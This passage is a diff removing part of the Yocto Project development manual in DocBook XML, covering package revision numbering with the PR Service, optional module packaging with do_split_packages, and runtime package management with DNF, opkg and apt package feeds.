- <ulink url='https://wiki.yoctoproject.org/wiki/PR_Service'>PR Service</ulink>:
- A network-based service that helps automate keeping
- package feeds compatible with existing package
- manager applications such as RPM, APT, and OPKG.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Whenever the binary package content changes, the binary package
- version must change.
- Changing the binary package version is accomplished by changing
- or "bumping" the <filename>PR</filename> and/or
- <filename>PV</filename> values.
- Increasing these values occurs one of two ways:
- <itemizedlist>
- <listitem><para>Automatically using a Package Revision
- Service (PR Service).
- </para></listitem>
- <listitem><para>Manually incrementing the
- <filename>PR</filename> and/or
- <filename>PV</filename> variables.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Given a primary challenge of any build system and its users
- is how to maintain a package feed that is compatible with
- existing package manager applications such as RPM, APT, and
- OPKG, using an automated system is much preferred over a
- manual system.
- In either system, the main requirement is that binary package
- version numbering increases in a linear fashion and that a
- number of version components exist that support that linear
- progression.
- For information on how to ensure package revisioning remains
- linear, see the
- "<link linkend='automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</link>"
- section.
- </para>
-
- <para>
- The following three sections provide related information on the
- PR Service, the manual method for "bumping"
- <filename>PR</filename> and/or <filename>PV</filename>, and
- on how to ensure binary package revisioning remains linear.
- </para>
-
- <section id='working-with-a-pr-service'>
- <title>Working With a PR Service</title>
-
- <para>
- As mentioned, attempting to maintain revision numbers in the
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
- is error prone, inaccurate, and causes problems for people
- submitting recipes.
- Conversely, the PR Service automatically generates
- increasing numbers, particularly the revision field,
- which removes the human element.
- <note>
- For additional information on using a PR Service, you
- can see the
- <ulink url='&YOCTO_WIKI_URL;/wiki/PR_Service'>PR Service</ulink>
- wiki page.
- </note>
- </para>
-
- <para>
- The Yocto Project uses variables in order of
- decreasing priority to facilitate revision numbering (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>, and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- for epoch, version, and revision, respectively).
- The values are highly dependent on the policies and
- procedures of a given distribution and package feed.
- </para>
-
- <para>
- Because the OpenEmbedded build system uses
- "<ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>signatures</ulink>",
- which are unique to a given build, the build system
- knows when to rebuild packages.
- All the inputs into a given task are represented by a
- signature, which can trigger a rebuild when different.
- Thus, the build system itself does not rely on the
- <filename>PR</filename>, <filename>PV</filename>, and
- <filename>PE</filename> numbers to trigger a rebuild.
- The signatures, however, can be used to generate
- these values.
- </para>
-
- <para>
- The PR Service works with both
- <filename>OEBasic</filename> and
- <filename>OEBasicHash</filename> generators.
- The value of <filename>PR</filename> bumps when the
- checksum changes and the different generator mechanisms
- change signatures under different circumstances.
- </para>
-
- <para>
- As implemented, the build system includes values from
- the PR Service into the <filename>PR</filename> field as
- an addition using the form "<filename>.x</filename>" so
- <filename>r0</filename> becomes <filename>r0.1</filename>,
- <filename>r0.2</filename> and so forth.
- This scheme allows existing <filename>PR</filename> values
- to be used for whatever reasons, which include manual
- <filename>PR</filename> bumps, should it be necessary.
- </para>
-
- <para>
- By default, the PR Service is not enabled or running.
- Thus, the packages generated are just "self consistent".
- The build system adds and removes packages and
- there are no guarantees about upgrade paths but images
- will be consistent and correct with the latest changes.
- </para>
-
- <para>
- The simplest form for a PR Service is for it to exist
- for a single host development system that builds the
- package feed (building system).
- For this scenario, you can enable a local PR Service by
- setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PRSERV_HOST'><filename>PRSERV_HOST</filename></ulink>
- in your <filename>local.conf</filename> file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- PRSERV_HOST = "localhost:0"
- </literallayout>
- Once the service is started, packages will automatically
- get increasing <filename>PR</filename> values and
- BitBake takes care of starting and stopping the server.
- </para>
-
- <para>
- If you have a more complex setup where multiple host
- development systems work against a common, shared package
- feed, you have a single PR Service running and it is
- connected to each building system.
- For this scenario, you need to start the PR Service using
- the <filename>bitbake-prserv</filename> command:
- <literallayout class='monospaced'>
- bitbake-prserv --host <replaceable>ip</replaceable> --port <replaceable>port</replaceable> --start
- </literallayout>
- In addition to hand-starting the service, you need to
- update the <filename>local.conf</filename> file of each
- building system as described earlier so each system
- points to the server and port.
- </para>
-
- <para>
- It is also recommended you use build history, which adds
- some sanity checks to binary package versions, in
- conjunction with the server that is running the PR Service.
- To enable build history, add the following to each building
- system's <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- # It is recommended to activate "buildhistory" for testing the PR service
- INHERIT += "buildhistory"
- BUILDHISTORY_COMMIT = "1"
- </literallayout>
- For information on build history, see the
- "<link linkend='maintaining-build-output-quality'>Maintaining Build Output Quality</link>"
- section.
- </para>
-
- <note>
- <para>
- The OpenEmbedded build system does not maintain
- <filename>PR</filename> information as part of the
- shared state (sstate) packages.
- If you maintain an sstate feed, its expected that either
- all your building systems that contribute to the sstate
- feed use a shared PR Service, or you do not run a PR
- Service on any of your building systems.
- Having some systems use a PR Service while others do
- not leads to obvious problems.
- </para>
-
- <para>
- For more information on shared state, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>Shared State Cache</ulink>"
- section in the Yocto Project Overview and Concepts
- Manual.
- </para>
- </note>
- </section>
-
- <section id='manually-bumping-pr'>
- <title>Manually Bumping PR</title>
-
- <para>
- The alternative to setting up a PR Service is to manually
- "bump" the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- variable.
- </para>
-
- <para>
- If a committed change results in changing the package
- output, then the value of the PR variable needs to be
- increased (or "bumped") as part of that commit.
- For new recipes you should add the <filename>PR</filename>
- variable and set its initial value equal to "r0", which is
- the default.
- Even though the default value is "r0", the practice of
- adding it to a new recipe makes it harder to forget to bump
- the variable when you make changes to the recipe in future.
- </para>
-
- <para>
- If you are sharing a common <filename>.inc</filename> file
- with multiple recipes, you can also use the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-INC_PR'>INC_PR</ulink></filename>
- variable to ensure that the recipes sharing the
- <filename>.inc</filename> file are rebuilt when the
- <filename>.inc</filename> file itself is changed.
- The <filename>.inc</filename> file must set
- <filename>INC_PR</filename> (initially to "r0"), and all
- recipes referring to it should set <filename>PR</filename>
- to "${INC_PR}.0" initially, incrementing the last number
- when the recipe is changed.
- If the <filename>.inc</filename> file is changed then its
- <filename>INC_PR</filename> should be incremented.
- </para>
-
- <para>
- When upgrading the version of a binary package, assuming the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'>PV</ulink></filename>
- changes, the <filename>PR</filename> variable should be
- reset to "r0" (or "${INC_PR}.0" if you are using
- <filename>INC_PR</filename>).
- </para>
-
- <para>
- Usually, version increases occur only to binary packages.
- However, if for some reason <filename>PV</filename> changes
- but does not increase, you can increase the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PE'>PE</ulink></filename>
- variable (Package Epoch).
- The <filename>PE</filename> variable defaults to "0".
- </para>
-
- <para>
- Binary package version numbering strives to follow the
- <ulink url='http://www.debian.org/doc/debian-policy/ch-controlfields.html'>
- Debian Version Field Policy Guidelines</ulink>.
- These guidelines define how versions are compared and what
- "increasing" a version means.
- </para>
- </section>
-
- <section id='automatically-incrementing-a-binary-package-revision-number'>
- <title>Automatically Incrementing a Package Version Number</title>
-
- <para>
- When fetching a repository, BitBake uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- variable to determine the specific source code revision
- from which to build.
- You set the <filename>SRCREV</filename> variable to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink>
- to cause the OpenEmbedded build system to automatically use the
- latest revision of the software:
- <literallayout class='monospaced'>
- SRCREV = "${AUTOREV}"
- </literallayout>
- </para>
-
- <para>
- Furthermore, you need to reference <filename>SRCPV</filename>
- in <filename>PV</filename> in order to automatically update
- the version whenever the revision of the source code
- changes.
- Here is an example:
- <literallayout class='monospaced'>
- PV = "1.0+git${SRCPV}"
- </literallayout>
- The OpenEmbedded build system substitutes
- <filename>SRCPV</filename> with the following:
- <literallayout class='monospaced'>
- AUTOINC+<replaceable>source_code_revision</replaceable>
- </literallayout>
- The build system replaces the <filename>AUTOINC</filename> with
- a number.
- The number used depends on the state of the PR Service:
- <itemizedlist>
- <listitem><para>
- If PR Service is enabled, the build system increments
- the number, which is similar to the behavior of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>.
- This behavior results in linearly increasing package
- versions, which is desirable.
- Here is an example:
- <literallayout class='monospaced'>
- hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
- hello-world-git_0.0+git1+dd2f5c3565-r0.0_armv7a-neon.ipk
- </literallayout>
- </para></listitem>
- <listitem><para>
- If PR Service is not enabled, the build system
- replaces the <filename>AUTOINC</filename>
- placeholder with zero (i.e. "0").
- This results in changing the package version since
- the source revision is included.
- However, package versions are not increased linearly.
- Here is an example:
- <literallayout class='monospaced'>
- hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
- hello-world-git_0.0+git0+dd2f5c3565-r0.0_armv7a-neon.ipk
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- In summary, the OpenEmbedded build system does not track the
- history of binary package versions for this purpose.
- <filename>AUTOINC</filename>, in this case, is comparable to
- <filename>PR</filename>.
- If PR server is not enabled, <filename>AUTOINC</filename>
- in the package version is simply replaced by "0".
- If PR server is enabled, the build system keeps track of the
- package versions and bumps the number when the package
- revision changes.
- </para>
- </section>
- </section>
-
- <section id='handling-optional-module-packaging'>
- <title>Handling Optional Module Packaging</title>
-
- <para>
- Many pieces of software split functionality into optional
- modules (or plugins) and the plugins that are built
- might depend on configuration options.
- To avoid having to duplicate the logic that determines what
- modules are available in your recipe or to avoid having
- to package each module by hand, the OpenEmbedded build system
- provides functionality to handle module packaging dynamically.
- </para>
-
- <para>
- To handle optional module packaging, you need to do two things:
- <itemizedlist>
- <listitem><para>Ensure the module packaging is actually
- done.</para></listitem>
- <listitem><para>Ensure that any dependencies on optional
- modules from other recipes are satisfied by your recipe.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='making-sure-the-packaging-is-done'>
- <title>Making Sure the Packaging is Done</title>
-
- <para>
- To ensure the module packaging actually gets done, you use
- the <filename>do_split_packages</filename> function within
- the <filename>populate_packages</filename> Python function
- in your recipe.
- The <filename>do_split_packages</filename> function
- searches for a pattern of files or directories under a
- specified path and creates a package for each one it finds
- by appending to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
- variable and setting the appropriate values for
- <filename>FILES_packagename</filename>,
- <filename>RDEPENDS_packagename</filename>,
- <filename>DESCRIPTION_packagename</filename>, and so forth.
- Here is an example from the <filename>lighttpd</filename>
- recipe:
- <literallayout class='monospaced'>
- python populate_packages_prepend () {
- lighttpd_libdir = d.expand('${libdir}')
- do_split_packages(d, lighttpd_libdir, '^mod_(.*)\.so$',
- 'lighttpd-module-%s', 'Lighttpd module for %s',
- extra_depends='')
- }
- </literallayout>
- The previous example specifies a number of things in the
- call to <filename>do_split_packages</filename>.
- <itemizedlist>
- <listitem><para>A directory within the files installed
- by your recipe through <filename>do_install</filename>
- in which to search.</para></listitem>
- <listitem><para>A regular expression used to match module
- files in that directory.
- In the example, note the parentheses () that mark
- the part of the expression from which the module
- name should be derived.</para></listitem>
- <listitem><para>A pattern to use for the package names.
- </para></listitem>
- <listitem><para>A description for each package.
- </para></listitem>
- <listitem><para>An empty string for
- <filename>extra_depends</filename>, which disables
- the default dependency on the main
- <filename>lighttpd</filename> package.
- Thus, if a file in <filename>${libdir}</filename>
- called <filename>mod_alias.so</filename> is found,
- a package called <filename>lighttpd-module-alias</filename>
- is created for it and the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DESCRIPTION'><filename>DESCRIPTION</filename></ulink>
- is set to "Lighttpd module for alias".</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Often, packaging modules is as simple as the previous
- example.
- However, more advanced options exist that you can use
- within <filename>do_split_packages</filename> to modify its
- behavior.
- And, if you need to, you can add more logic by specifying
- a hook function that is called for each package.
- It is also perfectly acceptable to call
- <filename>do_split_packages</filename> multiple times if
- you have more than one set of modules to package.
- </para>
-
- <para>
- For more examples that show how to use
- <filename>do_split_packages</filename>, see the
- <filename>connman.inc</filename> file in the
- <filename>meta/recipes-connectivity/connman/</filename>
- directory of the <filename>poky</filename>
- <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>source repository</ulink>.
- You can also find examples in
- <filename>meta/classes/kernel.bbclass</filename>.
- </para>
-
- <para>
- Following is a reference that shows
- <filename>do_split_packages</filename> mandatory and
- optional arguments:
- <literallayout class='monospaced'>
- Mandatory arguments
-
- root
- The path in which to search
- file_regex
- Regular expression to match searched files.
- Use parentheses () to mark the part of this
- expression that should be used to derive the
- module name (to be substituted where %s is
- used in other function arguments as noted below)
- output_pattern
- Pattern to use for the package names. Must
- include %s.
- description
- Description to set for each package. Must
- include %s.
-
- Optional arguments
-
- postinst
- Postinstall script to use for all packages
- (as a string)
- recursive
- True to perform a recursive search - default
- False
- hook
- A hook function to be called for every match.
- The function will be called with the following
- arguments (in the order listed):
-
- f
- Full path to the file/directory match
- pkg
- The package name
- file_regex
- As above
- output_pattern
- As above
- modulename
- The module name derived using file_regex
-
- extra_depends
- Extra runtime dependencies (RDEPENDS) to be
- set for all packages. The default value of None
- causes a dependency on the main package
- (${PN}) - if you do not want this, pass empty
- string '' for this parameter.
- aux_files_pattern
- Extra item(s) to be added to FILES for each
- package. Can be a single string item or a list
- of strings for multiple items. Must include %s.
- postrm
- postrm script to use for all packages (as a
- string)
- allow_dirs
- True to allow directories to be matched -
- default False
- prepend
- If True, prepend created packages to PACKAGES
- instead of the default False which appends them
- match_path
- match file_regex on the whole relative path to
- the root rather than just the file name
- aux_files_pattern_verbatim
- Extra item(s) to be added to FILES for each
- package, using the actual derived module name
- rather than converting it to something legal
- for a package name. Can be a single string item
- or a list of strings for multiple items. Must
- include %s.
- allow_links
- True to allow symlinks to be matched - default
- False
- summary
- Summary to set for each package. Must include %s;
- defaults to description if not set.
- </literallayout>
- </para>
- </section>
-
- <section id='satisfying-dependencies'>
- <title>Satisfying Dependencies</title>
-
- <para>
- The second part for handling optional module packaging
- is to ensure that any dependencies on optional modules
- from other recipes are satisfied by your recipe.
- You can be sure these dependencies are satisfied by
- using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></ulink> variable.
- Here is an example that continues with the
- <filename>lighttpd</filename> recipe shown earlier:
- <literallayout class='monospaced'>
- PACKAGES_DYNAMIC = "lighttpd-module-.*"
- </literallayout>
- The name specified in the regular expression can of
- course be anything.
- In this example, it is <filename>lighttpd-module-</filename>
- and is specified as the prefix to ensure that any
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
- on a package name starting with the prefix are satisfied
- during build time.
- If you are using <filename>do_split_packages</filename>
- as described in the previous section, the value you put in
- <filename>PACKAGES_DYNAMIC</filename> should correspond to
- the name pattern specified in the call to
- <filename>do_split_packages</filename>.
- </para>
- </section>
- </section>
-
- <section id='using-runtime-package-management'>
- <title>Using Runtime Package Management</title>
-
- <para>
- During a build, BitBake always transforms a recipe into one or
- more packages.
- For example, BitBake takes the <filename>bash</filename> recipe
- and produces a number of packages (e.g.
- <filename>bash</filename>, <filename>bash-bashbug</filename>,
- <filename>bash-completion</filename>,
- <filename>bash-completion-dbg</filename>,
- <filename>bash-completion-dev</filename>,
- <filename>bash-completion-extra</filename>,
- <filename>bash-dbg</filename>, and so forth).
- Not all generated packages are included in an image.
- </para>
-
- <para>
- In several situations, you might need to update, add, remove,
- or query the packages on a target device at runtime
- (i.e. without having to generate a new image).
- Examples of such situations include:
- <itemizedlist>
- <listitem><para>
- You want to provide in-the-field updates to deployed
- devices (e.g. security updates).
- </para></listitem>
- <listitem><para>
- You want to have a fast turn-around development cycle
- for one or more applications that run on your device.
- </para></listitem>
- <listitem><para>
- You want to temporarily install the "debug" packages
- of various applications on your device so that
- debugging can be greatly improved by allowing
- access to symbols and source debugging.
- </para></listitem>
- <listitem><para>
- You want to deploy a more minimal package selection of
- your device but allow in-the-field updates to add a
- larger selection for customization.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- In all these situations, you have something similar to a more
- traditional Linux distribution in that in-field devices
- are able to receive pre-compiled packages from a server for
- installation or update.
- Being able to install these packages on a running,
- in-field device is what is termed "runtime package
- management".
- </para>
-
- <para>
- In order to use runtime package management, you
- need a host or server machine that serves up the pre-compiled
- packages plus the required metadata.
- You also need package manipulation tools on the target.
- The build machine is a likely candidate to act as the server.
- However, that machine does not necessarily have to be the
- package server.
- The build machine could push its artifacts to another machine
- that acts as the server (e.g. Internet-facing).
- In fact, doing so is advantageous for a production
- environment as getting the packages away from the
- development system's build directory prevents accidental
- overwrites.
- </para>
-
- <para>
- A simple build that targets just one device produces
- more than one package database.
- In other words, the packages produced by a build are separated
- out into a couple of different package groupings based on
- criteria such as the target's CPU architecture, the target
- board, or the C library used on the target.
- For example, a build targeting the <filename>qemux86</filename>
- device produces the following three package databases:
- <filename>noarch</filename>, <filename>i586</filename>, and
- <filename>qemux86</filename>.
- If you wanted your <filename>qemux86</filename> device to be
- aware of all the packages that were available to it,
- you would need to point it to each of these databases
- individually.
- In a similar way, a traditional Linux distribution usually is
- configured to be aware of a number of software repositories
- from which it retrieves packages.
- </para>
-
- <para>
- Using runtime package management is completely optional and
- not required for a successful build or deployment in any
- way.
- But if you want to make use of runtime package management,
- you need to do a couple things above and beyond the basics.
- The remainder of this section describes what you need to do.
- </para>
-
- <section id='runtime-package-management-build'>
- <title>Build Considerations</title>
-
- <para>
- This section describes build considerations of which you
- need to be aware in order to provide support for runtime
- package management.
- </para>
-
- <para>
- When BitBake generates packages, it needs to know
- what format or formats to use.
- In your configuration, you use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- variable to specify the format:
- <orderedlist>
- <listitem><para>
- Open the <filename>local.conf</filename> file
- inside your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- (e.g. <filename>~/poky/build/conf/local.conf</filename>).
- </para></listitem>
- <listitem><para>
- Select the desired package format as follows:
- <literallayout class='monospaced'>
- PACKAGE_CLASSES ?= “package_<replaceable>packageformat</replaceable>â€
- </literallayout>
- where <replaceable>packageformat</replaceable>
- can be "ipk", "rpm", "deb", or "tar" which are the
- supported package formats.
- <note>
- Because the Yocto Project supports four
- different package formats, you can set the
- variable with more than one argument.
- However, the OpenEmbedded build system only
- uses the first argument when creating an image
- or Software Development Kit (SDK).
- </note>
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- If you would like your image to start off with a basic
- package database containing the packages in your current
- build as well as to have the relevant tools available on the
- target for runtime package management, you can include
- "package-management" in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
- variable.
- Including "package-management" in this configuration
- variable ensures that when the image is assembled for your
- target, the image includes the currently-known package
- databases as well as the target-specific tools required
- for runtime package management to be performed on the
- target.
- However, this is not strictly necessary.
- You could start your image off without any databases
- but only include the required on-target package
- tool(s).
- As an example, you could include "opkg" in your
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
- variable if you are using the IPK package format.
- You can then initialize your target's package database(s)
- later once your image is up and running.
- </para>
-
- <para>
- Whenever you perform any sort of build step that can
- potentially generate a package or modify existing
- package, it is always a good idea to re-generate the
- package index after the build by using the following
- command:
- <literallayout class='monospaced'>
- $ bitbake package-index
- </literallayout>
- It might be tempting to build the package and the
- package index at the same time with a command such as
- the following:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>some-package</replaceable> package-index
- </literallayout>
- Do not do this as BitBake does not schedule the package
- index for after the completion of the package you are
- building.
- Consequently, you cannot be sure of the package index
- including information for the package you just built.
- Thus, be sure to run the package update step separately
- after building any packages.
- </para>
-
- <para>
- You can use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
- variables to pre-configure target images to use a package
- feed.
- If you do not define these variables, then manual steps
- as described in the subsequent sections are necessary to
- configure the target.
- You should set these variables before building the image
- in order to produce a correctly configured image.
- </para>
-
- <para>
- When your build is complete, your packages reside in the
- <filename>${TMPDIR}/deploy/<replaceable>packageformat</replaceable></filename>
- directory.
- For example, if
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink><filename>}</filename>
- is <filename>tmp</filename> and your selected package type
- is RPM, then your RPM packages are available in
- <filename>tmp/deploy/rpm</filename>.
- </para>
- </section>
-
- <section id='runtime-package-management-server'>
- <title>Host or Server Machine Setup</title>
-
- <para>
- Although other protocols are possible, a server using HTTP
- typically serves packages.
- If you want to use HTTP, then set up and configure a
- web server such as Apache 2, lighttpd, or
- SimpleHTTPServer on the machine serving the packages.
- </para>
-
- <para>
- To keep things simple, this section describes how to set
- up a SimpleHTTPServer web server to share package feeds
- from the developer's machine.
- Although this server might not be the best for a production
- environment, the setup is simple and straight forward.
- Should you want to use a different server more suited for
- production (e.g. Apache 2, Lighttpd, or Nginx), take the
- appropriate steps to do so.
- </para>
-
- <para>
- From within the build directory where you have built an
- image based on your packaging choice (i.e. the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- setting), simply start the server.
- The following example assumes a build directory of
- <filename>~/poky/build/tmp/deploy/rpm</filename> and a
- <filename>PACKAGE_CLASSES</filename> setting of
- "package_rpm":
- <literallayout class='monospaced'>
- $ cd ~/poky/build/tmp/deploy/rpm
- $ python -m SimpleHTTPServer
- </literallayout>
- </para>
- </section>
-
- <section id='runtime-package-management-target'>
- <title>Target Setup</title>
-
- <para>
- Setting up the target differs depending on the
- package management system.
- This section provides information for RPM, IPK, and DEB.
- </para>
-
- <section id='runtime-package-management-target-rpm'>
- <title>Using RPM</title>
-
- <para>
- The
- <ulink url='https://en.wikipedia.org/wiki/DNF_(software)'>Dandified Packaging Tool</ulink>
- (DNF) performs runtime package management of RPM
- packages.
- In order to use DNF for runtime package management,
- you must perform an initial setup on the target
- machine for cases where the
- <filename>PACKAGE_FEED_*</filename> variables were not
- set as part of the image that is running on the
- target.
- This means if you built your image and did not not use
- these variables as part of the build and your image is
- now running on the target, you need to perform the
- steps in this section if you want to use runtime
- package management.
- <note>
- For information on the
- <filename>PACKAGE_FEED_*</filename> variables, see
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
- in the Yocto Project Reference Manual variables
- glossary.
- </note>
- </para>
-
- <para>
- On the target, you must inform DNF that package
- databases are available.
- You do this by creating a file named
- <filename>/etc/yum.repos.d/oe-packages.repo</filename>
- and defining the <filename>oe-packages</filename>.
- </para>
-
- <para>
- As an example, assume the target is able to use the
- following package databases:
- <filename>all</filename>, <filename>i586</filename>,
- and <filename>qemux86</filename> from a server named
- <filename>my.server</filename>.
- The specifics for setting up the web server are up to
- you.
- The critical requirement is that the URIs in the
- target repository configuration point to the
- correct remote location for the feeds.
- <note><title>Tip</title>
- For development purposes, you can point the web
- server to the build system's
- <filename>deploy</filename> directory.
- However, for production use, it is better to copy
- the package directories to a location outside of
- the build area and use that location.
- Doing so avoids situations where the build system
- overwrites or changes the
- <filename>deploy</filename> directory.
- </note>
- </para>
-
- <para>
- When telling DNF where to look for the package
- databases, you must declare individual locations
- per architecture or a single location used for all
- architectures.
- You cannot do both:
- <itemizedlist>
- <listitem><para>
- <emphasis>Create an Explicit List of Architectures:</emphasis>
- Define individual base URLs to identify where
- each package database is located:
- <literallayout class='monospaced'>
- [oe-packages]
- baseurl=http://my.server/rpm/i586 http://my.server/rpm/qemux86 http://my.server/rpm/all
- </literallayout>
- This example informs DNF about individual
- package databases for all three architectures.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Single (Full) Package Index:</emphasis>
- Define a single base URL that identifies where
- a full package database is located:
- <literallayout class='monospaced'>
- [oe-packages]
- baseurl=http://my.server/rpm
- </literallayout>
- This example informs DNF about a single package
- database that contains all the package index
- information for all supported architectures.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Once you have informed DNF where to find the package
- databases, you need to fetch them:
- <literallayout class='monospaced'>
- # dnf makecache
- </literallayout>
- DNF is now able to find, install, and upgrade packages
- from the specified repository or repositories.
- <note>
- See the
- <ulink url='http://dnf.readthedocs.io/en/latest/'>DNF documentation</ulink>
- for additional information.
- </note>
- </para>
- </section>
-
- <section id='runtime-package-management-target-ipk'>
- <title>Using IPK</title>
-
- <para>
- The <filename>opkg</filename> application performs
- runtime package management of IPK packages.
- You must perform an initial setup for
- <filename>opkg</filename> on the target machine
- if the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>, and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
- variables have not been set or the target image was
- built before the variables were set.
- </para>
-
- <para>
- The <filename>opkg</filename> application uses
- configuration files to find available package
- databases.
- Thus, you need to create a configuration file inside
- the <filename>/etc/opkg/</filename> direction, which
- informs <filename>opkg</filename> of any repository
- you want to use.
- </para>
-
- <para>
- As an example, suppose you are serving packages from a
- <filename>ipk/</filename> directory containing the
- <filename>i586</filename>,
- <filename>all</filename>, and
- <filename>qemux86</filename> databases through an
- HTTP server named <filename>my.server</filename>.
- On the target, create a configuration file
- (e.g. <filename>my_repo.conf</filename>) inside the
- <filename>/etc/opkg/</filename> directory containing
- the following:
- <literallayout class='monospaced'>
- src/gz all http://my.server/ipk/all
- src/gz i586 http://my.server/ipk/i586
- src/gz qemux86 http://my.server/ipk/qemux86
- </literallayout>
- Next, instruct <filename>opkg</filename> to fetch
- the repository information:
- <literallayout class='monospaced'>
- # opkg update
- </literallayout>
- The <filename>opkg</filename> application is now able
- to find, install, and upgrade packages from the
- specified repository.
- </para>
- </section>
-
- <section id='runtime-package-management-target-deb'>
- <title>Using DEB</title>
-
- <para>
- The <filename>apt</filename> application performs
- runtime package management of DEB packages.
- This application uses a source list file to find
- available package databases.
- You must perform an initial setup for
- <filename>apt</filename> on the target machine
- if the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></ulink>, and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></ulink>
- variables have not been set or the target image was
- built before the variables were set.
- </para>
-
- <para>
- To inform <filename>apt</filename> of the repository
- you want to use, you might create a list file (e.g.
- <filename>my_repo.list</filename>) inside the
- <filename>/etc/apt/sources.list.d/</filename>
- directory.
- As an example, suppose you are serving packages from a
- <filename>deb/</filename> directory containing the
- <filename>i586</filename>,
- <filename>all</filename>, and
- <filename>qemux86</filename> databases through an
- HTTP server named <filename>my.server</filename>.
- The list file should contain:
- <literallayout class='monospaced'>
- deb http://my.server/deb/all ./
- deb http://my.server/deb/i586 ./
- deb http://my.server/deb/qemux86 ./
- </literallayout>
- Next, instruct the <filename>apt</filename>
- application to fetch the repository information:
- <literallayout class='monospaced'>
- # apt-get update
- </literallayout>
- After this step, <filename>apt</filename> is able
- to find, install, and upgrade packages from the
- specified repository.
- </para>
- </section>
- </section>
- </section>
-
- <section id='generating-and-using-signed-packages'>
- <title>Generating and Using Signed Packages</title>
- <para>
- In order to add security to RPM packages used during a build,
- you can take steps to securely sign them.
- Once a signature is verified, the OpenEmbedded build system
- can use the package in the build.
- If security fails for a signed package, the build system
- aborts the build.
- </para>
-
- <para>
- This section describes how to sign RPM packages during a build
- and how to use signed package feeds (repositories) when
- doing a build.
- </para>
-
- <section id='signing-rpm-packages'>
